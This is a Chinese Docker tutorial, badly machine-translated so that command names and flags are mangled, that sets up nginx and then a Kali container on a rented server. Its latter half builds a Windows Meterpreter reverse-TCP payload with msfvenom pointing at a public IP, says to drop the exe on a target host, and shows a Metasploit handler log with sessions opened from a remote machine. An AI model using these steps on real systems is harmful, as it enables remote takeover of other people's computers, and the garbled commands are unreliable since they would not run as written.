1。购买一个外网的服务器,这里我使用的是centos
2。配置百胜源
<代码> https://mirrors.ustc.edu.cn/docker-ce/linux/centos/docker-ce.repo wget - o/etc/yum.repos.d/docker-ce.repo 百胜清洁;百胜makecache快——重新刷新百胜源代码>
3。安装与启动码头工人
<代码> yum - y docker-ce安装 systemctl重启码头工人 systemctl使码头工人开机自启代码>
4。搜索与安装容器
4.1以nginx为例
<代码>码头工人搜索nginx搜索 码头工人拉nginx安装nginx 代码>
4.2启动nginx h5> <代码>码头工人运行——名称web1 - d - p 80:80 nginx
——名称:表示启动的名字
- d:守护进程,守护进程
p:设置映射端口
验证页面,输入网址即可访问代码>
对页面进行修改:
<代码>码头工人exec - web1/bin/bash进入容器 root@3e93e119b79c:/#猫/usr/share/nginx/html/50 x。html index . html root@3e93e119b79c:/#回声”& lt; h2>测试nginx page”比;/usr/share/nginx/html/index.html 使用出口退出,这时刷新之前的网页,nginx的欢迎页面就变成上面修改的内容了。代码>
5。安装外网卡莉
先搜索
<代码>码头工人搜索卡莉代码>
安装
<代码>码头工人拉booyaabes/kali-linux-full 代码>
使用
<代码> root@vultr ~ #码头工人形象ls 标签影像ID创建存储库的大小 booyaabes/kali-linux-full最新4 bffca040c1c 6小时前8.31 gb nginx最新bc26f1ed35cf 16小时前109 mb (root@vultr ~) #码头工人- 4 bffca040c1c运行 root@c5785446988a:/#猫/etc/os-release PRETTY_NAME="卡莉GNU/Linux滚动” NAME="卡莉GNU/Linux " ID=卡莉 VERSION=" 2018.4 " VERSION_ID=" 2018.4 " ID_LIKE=debian ANSI_COLOR=" 1; 31 " HOME_URL=" https://www.kali.org/" SUPPORT_URL=" https://forums.kali.org/" BUG_REPORT_URL=" https://bugs.kali.org/" 代码>
直接使用即可。
如果需要监听端口,实现连接反弹外壳
<代码>码头工人运行- p 4444:4455 - booyaabes/kali-linux-full 代码>
使用码头工人映射容器4455端口到地方上的4444端口
<代码> root@vultr ~ #码头工人容器ls 容器标识图像命令创建状态端口名称 8612年e672d5db booyaabes/kali-linux-full”/bin/sh - c \”/bin/ba…“2分钟前2分钟0.0.0.0:4444→4455/tcp hungry_goldberg [root@vultr ~] #码头工人附加8612 e672d5db进入卡莉容器之中代码>
制作有效载荷(使用本地的卡莉制作有效负载)
<代码> root@kal: ~ # msfvenom - p windows/meterpreter reverse_tcp LHOST=149.248.8.210 LPORT=4444 - f exe祝辞test.exe 没有选择的平台,选择Msf:模块::平台::Windows的负载 没有拱选中,选择拱:x86的负载 没有编码器或badchars指定,输出原始载荷 载荷大小:341字节 最后的exe文件大小:73802字节代码> >之前将exe文件放到目标主机上
在卡莉容器中运行msf<代码> root@vultr ~ #码头工人9 b2fcb0c1d21附加 root@9b2fcb0c1d21:/# msfconsole ,,/\ (__ - - - - - -,,,- _)) (_)O O (_) ___________/| \ \ _ o_o \ F M S | \ \ _____ | * | | | WW | | | | | | | | |=(metasploit v4.17.14-dev) + - - - - -=[1809利用- 1030辅助- 313篇文章] + - - - - -=(539载荷- 42编码器10空操作) + - - - - -=[免费Metasploit Pro试用:http://r-7。有限公司/trymsp] 无国界医生组织在使用开发/多/处理程序 无国界医生组织利用(多/处理程序)的在设置/meterpreter/reverse_tcp负载窗口 有效载荷=比;windows/meterpreter/reverse_tcp 无国界医生组织利用(多/处理程序)的在设置lhost 149.248.8.210 lhost=比;149.248.8.210 无国界医生组织利用(多/处理程序)的在设置lport 4455 端口=比;4455 无国界医生组织利用(多/处理程序)的在运行 (-)处理程序未能结合149.248.8.210:4455:- - - - - - - [*]开始反向0.0.0.0:4455 TCP处理程序 [*]向42.90.91.248阶段(179779字节) [*]Meterpreter会话1打开(172.17.0.3:4455→42.90.91.248:11526)2018-09-26 09:39:23 + 0000 [*]向42.90.91.248阶段(179779字节) [*]Meterpreter会话2打开(172.17.0.3:4455→42.90.91.248:11528)2018-09-26 09:39:25 + 0000 meterpreter祝辞码头工人使用教程